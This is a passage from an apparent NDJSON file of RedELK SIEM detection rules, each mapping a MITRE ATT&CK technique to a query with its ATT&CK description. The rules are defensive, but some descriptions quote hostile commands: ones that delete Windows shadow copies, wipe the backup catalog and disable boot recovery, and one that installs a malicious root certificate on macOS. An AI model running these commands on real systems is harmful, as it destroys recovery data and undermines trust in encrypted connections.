to events such as messages, keystrokes, and mouse inputs.[2][3]\nImport address table (IAT) hooking, which use modifications to a process’s IAT, where pointers to imported API functions are stored.[3][4][5]\nInline hooking, which overwrites the first bytes in an API function to redirect code flow.[3][6][5]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1179","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1179] Hooking","query":"threat.technique.id: T1179","references":["https://attack.mitre.org/techniques/T1179","https://attack.mitre.org/techniques/T1056/004"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1179","name":"Hooking","id":"T1179"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1179","name":"Hooking","id":"T1179"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0004","name":"Privilege Escalation","id":"TA0004"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1179","name":"Hooking","id":"T1179"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0006","name":"Credential Access","id":"TA0006"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Hypervisor","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1062","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1062] Hypervisor","query":"threat.technique.id: T1062","references":["https://attack.mitre.org/techniques/T1062"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1062","name":"Hypervisor","id":"T1062"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Image File Execution Options Injection","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1183","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1183] Image File Execution Options Injection","query":"threat.technique.id: T1183","references":["https://attack.mitre.org/techniques/T1183","https://attack.mitre.org/techniques/T1546/012"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1183","name":"Image File Execution Options Injection","id":"T1183"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0004","name":"Privilege Escalation","id":"TA0004"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1183","name":"Image File Execution Options Injection","id":"T1183"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1183","name":"Image File Execution Options Injection","id":"T1183"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may implant cloud container images with malicious code to establish persistence. Amazon Web Service (AWS) Amazon Machine Images (AMI), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.[1]\nA tool has been developed to facilitate planting backdoors in cloud container images.[2] If an attacker has access to a compromised AWS instance, and permissions to list the available container images, they may implant a backdoor such as a Web Shell.[1] Adversaries may also implant Docker images that may be inadvertently used in cloud deployments, which has been reported in some instances of cryptomining botnets.[3]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1525","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1525] Implant Container Image","query":"threat.technique.id: T1525","references":["https://attack.mitre.org/techniques/T1525"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1525","name":"Implant Container Image","id":"T1525"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting [1] or even disabling host-based sensors, such as Event Tracing for Windows (ETW),[2] by tampering settings that control the collection and flow of event telemetry. [3] These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as PowerShell or Windows Management Instrumentation.\nETW interruption can be achieved multiple ways, however most directly by defining conditions using the PowerShell Set-EtwTraceProvider cmdlet or by interfacing directly with the Registry to make alterations.\nIn the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1054","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1054] Indicator Blocking","query":"threat.technique.id: T1054","references":["https://attack.mitre.org/techniques/T1054","https://attack.mitre.org/techniques/T1562/006"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1054","name":"Indicator Blocking","id":"T1054"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware. Locations and format of logs are platform or product-specific, however standard operating system logs are captured as Windows events or Linux/macOS files such as Bash History and /var/log/*.\nThese actions may interfere with event collection, reporting, or other notifications used to detect intrusion activity. This that may compromise the integrity of security solutions by causing notable events to go unreported. This activity may also impede forensic analysis and incident response, due to lack of sufficient data to determine what occurred.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1070","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1070] Indicator Removal on Host","query":"threat.technique.id: T1070","references":["https://attack.mitre.org/techniques/T1070"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1070","name":"Indicator Removal on Host","id":"T1070"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed. They can modify the tool by removing the indicator and using the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems.\nA good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may modify the file to explicitly avoid that signature, and then re-use the malware.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1066","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1066] Indicator Removal from Tools","query":"threat.technique.id: T1066","references":["https://attack.mitre.org/techniques/T1066","https://attack.mitre.org/techniques/T1027/005"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1066","name":"Indicator Removal from Tools","id":"T1066"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking cmd. For example, Forfiles, the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a Command and Scripting Interpreter, Run window, or via scripts. [1] [2]\nAdversaries may abuse these features for Defense Evasion, specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of cmd or file extensions more commonly associated with malicious payloads.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1202","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1202] Indirect Command Execution","query":"threat.technique.id: T1202","references":["https://attack.mitre.org/techniques/T1202"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1202","name":"Indirect Command Execution","id":"T1202"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.[1][2] Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of Data Destruction and Data Encrypted for Impact.[1][2]\nA number of native Windows utilities have been used by adversaries to disable or delete system recovery features:\nvssadmin.exe can be used to delete all volume shadow copies on a system - vssadmin.exe delete shadows /all /quiet\nWindows Management Instrumentation can be used to delete volume shadow copies - wmic shadowcopy delete\nwbadmin.exe can be used to delete the Windows Backup Catalog - wbadmin.exe delete catalog -quiet\nbcdedit.exe can be used to disable automatic Windows recovery features by modifying boot configuration data - bcdedit.exe /set {{default}} bootstatuspolicy ignoreallfailures & bcdedit /set {{default}} recoveryenabled no","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1490","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1490] Inhibit System Recovery","query":"threat.technique.id: T1490","references":["https://attack.mitre.org/techniques/T1490"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1490","name":"Inhibit System Recovery","id":"T1490"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0040","name":"Impact","id":"TA0040"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture).","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1056","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1056] Input Capture","query":"threat.technique.id: T1056","references":["https://attack.mitre.org/techniques/T1056"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1056","name":"Input Capture","id":"T1056"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0009","name":"Collection","id":"TA0009"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1056","name":"Input Capture","id":"T1056"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0006","name":"Credential Access","id":"TA0006"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt. When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: Bypass User Access Control).\nAdversaries may mimic this functionality to prompt users for credentials with a seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.[1] This type of prompt can be used to collect credentials via various languages such as AppleScript[2][3] and PowerShell[2][4].","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1141","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1141] Input Prompt","query":"threat.technique.id: T1141","references":["https://attack.mitre.org/techniques/T1141","https://attack.mitre.org/techniques/T1056/002"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1141","name":"Input Prompt","id":"T1141"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0006","name":"Credential Access","id":"TA0006"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate. [1] Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.\nInstallation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system. Adversaries have used this technique to avoid security warnings prompting users when compromised systems connect over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login credentials. [2]\nAtypical root certificates have also been pre-installed on systems by the manufacturer or in the software supply chain and were used in conjunction with malware/adware to provide a man-in-the-middle capability for intercepting information transmitted over secure TLS/SSL communications. [3]\nRoot certificates (and their associated chains) can also be cloned and reinstalled. Cloned certificate chains will carry many of the same metadata characteristics of the source and can be used to sign malicious code that may then bypass signature validation tools (ex: Sysinternals, antivirus, etc.) used to block execution and/or uncover artifacts of Persistence. [4]\nIn macOS, the Ay MaMi malware uses /usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /path/to/malicious/cert to install a malicious certificate as a trusted root certificate into the system keychain. [5]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1130","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1130] Install Root Certificate","query":"threat.technique.id: T1130","references":["https://attack.mitre.org/techniques/T1130","https://attack.mitre.org/techniques/T1553/004"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1130","name":"Install Root Certificate","id":"T1130"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may use internal spearphishing to gain access to additional information or exploit other users within the same organization after they already have access to accounts or systems within the environment. Internal spearphishing is multi-staged attack where an email account is owned either by controlling the user's device with previously installed malware or by compromising the account credentials of the user. Adversaries attempt to take advantage of a trusted internal account to increase the likelihood of tricking the target into falling for the phish attempt.[1]\nAdversaries may leverage Spearphishing Attachment or Spearphishing Link as part of internal spearphishing to deliver a payload or redirect to an external site to capture credentials through Input Capture on sites that mimic email login interfaces.\nThere have been notable incidents where internal spearphishing has been used. The Eye Pyramid campaign used phishing emails with malicious attachments for lateral movement between victims, compromising nearly 18,000 email accounts in the process.[1] The Syrian Electronic Army (SEA) compromised email accounts at the Financial Times (FT) to steal additional account credentials. Once FT learned of the attack and began warning employees of the threat, the SEA sent phishing emails mimicking the Financial Times IT department and were able to compromise even more users.[2]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1534","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1534] Internal Spearphishing","query":"threat.technique.id: T1534","references":["https://attack.mitre.org/techniques/T1534"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1534","name":"Internal Spearphishing","id":"T1534"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0008","name":"Lateral Movement","id":"TA0008"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"InstallUtil","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1118","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1118] InstallUtil","query":"threat.technique.id: T1118","references":["https://attack.mitre.org/techniques/T1118","https://attack.mitre.org/techniques/T1218/004"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1118","name":"InstallUtil","id":"T1118"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1118","name":"InstallUtil","id":"T1118"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may abuse a valid Kerberos ticket-granting ticket (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket that may be vulnerable to Brute Force.[1][2]\nService principal names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service[3]).[4][5][6][7]\nAdversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC).[1][2] Portions of these tickets may be encrypted with the RC4 algorithm, meaning the Kerberos 5 TGS-REP etype 23 hash of the service account associated with the SPN is used as the private key and is thus vulnerable to offline Brute Force attacks that may expose plaintext credentials.[2][1] [7]\nThis same attack could be executed using service tickets captured from network traffic.[2]\nCracked hashes may enable Persistence, Privilege Escalation, and Lateral Movement via access to Valid Accounts.[6]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1208","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1208] Kerberoasting","query":"threat.technique.id: T1208","references":["https://attack.mitre.org/techniques/T1208","https://attack.mitre.org/techniques/T1558/003"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1208","name":"Kerberoasting","id":"T1208"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0006","name":"Credential Access","id":"TA0006"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system. [1]\nWhen used maliciously, LKMs can be a type of kernel-mode Rootkit that run with the highest operating system privilege (Ring 0). [2] Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors and enabling root access to non-privileged users. [3]\nKernel extensions, also called kext, are used for macOS to load functionality onto a system similar to LKMs for Linux. They are loaded and unloaded through kextload and kextunload commands.\nAdversaries can use LKMs and kexts to covertly persist on a system and elevate privileges. Examples have been found in the wild and there are some open source projects. [4] [5] [6] [7][8] [9][10] [11]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1215","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1215] Kernel Modules and Extensions","query":"threat.technique.id: T1215","references":["https://attack.mitre.org/techniques/T1215","https://attack.mitre.org/techniques/T1547/006"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1215","name":"Kernel Modules and Extensions","id":"T1215"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may collect the keychain storage data from a system to acquire credentials. Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features such as WiFi passwords, websites, secure notes, certificates, and Kerberos. Keychain files are located in ~/Library/Keychains/,/Library/Keychains/, and /Network/Library/Keychains/. [1] The security command-line utility, which is built into macOS by default, provides a useful way to manage these credentials.\nTo manage their credentials, users have to use additional credentials to access their keychain. If an adversary knows the credentials for the login keychain, then they can get access to all the other credentials stored in this vault. [2] By default, the passphrase for the keychain is the user’s logon credentials.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1142","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1142] Keychain","query":"threat.technique.id: T1142","references":["https://attack.mitre.org/techniques/T1142","https://attack.mitre.org/techniques/T1555/001"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1142","name":"Keychain","id":"T1142"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0006","name":"Credential Access","id":"TA0006"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"LC_MAIN Hijacking","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1149","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1149] LC_MAIN Hijacking","query":"threat.technique.id: T1149","references":["https://attack.mitre.org/techniques/T1149"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1149","name":"LC_MAIN Hijacking","id":"T1149"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies. [1] There are tools available to perform these changes.\nAdversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time. [2]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1161","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1161] LC_LOAD_DYLIB Addition","query":"threat.technique.id: T1161","references":["https://attack.mitre.org/techniques/T1161","https://attack.mitre.org/techniques/T1546/006"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1161","name":"LC_LOAD_DYLIB Addition","id":"T1161"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"By responding to LLMNR/NBT-NS network traffic, adversaries may spoof an authoritative source for name resolution to force communication with an adversary controlled system. This activity may be used to collect or relay authentication materials.\nLink-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their NetBIOS name. [1] [2]\nAdversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the adversary controlled system. The adversary can then collect the hash information sent over the wire through tools that monitor the ports for traffic or through Network Sniffing and crack the hashes offline through Brute Force to obtain the plaintext passwords. In some cases where an adversary has access to a system that is in the authentication path between systems or when automated scans that use credentials attempt to authenticate to an adversary controlled system, the NTLMv2 hashes can be intercepted and relayed to access and execute code against a target system. The relay step can happen in conjunction with poisoning but may also be independent of it. [3][4]\nSeveral tools exist that can be used to poison name services within local networks such as NBNSpoof, Metasploit, and Responder. [5] [6] [7]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1171","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1171] LLMNR/NBT-NS Poisoning and Relay","query":"threat.technique.id: T1171","references":["https://attack.mitre.org/techniques/T1171","https://attack.mitre.org/techniques/T1557/001"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1171","name":"LLMNR/NBT-NS Poisoning and Relay","id":"T1171"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0006","name":"Credential Access","id":"TA0006"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process. [1]\nAdversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., Hijack Execution Flow), an adversary can use LSA operations to continuously execute malicious payloads.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1177","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1177] LSASS Driver","query":"threat.technique.id: T1177","references":["https://attack.mitre.org/techniques/T1177","https://attack.mitre.org/techniques/T1547/008"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1177","name":"LSASS Driver","id":"T1177"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1177","name":"LSASS Driver","id":"T1177"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may create or modify launch agents to repeatedly execute 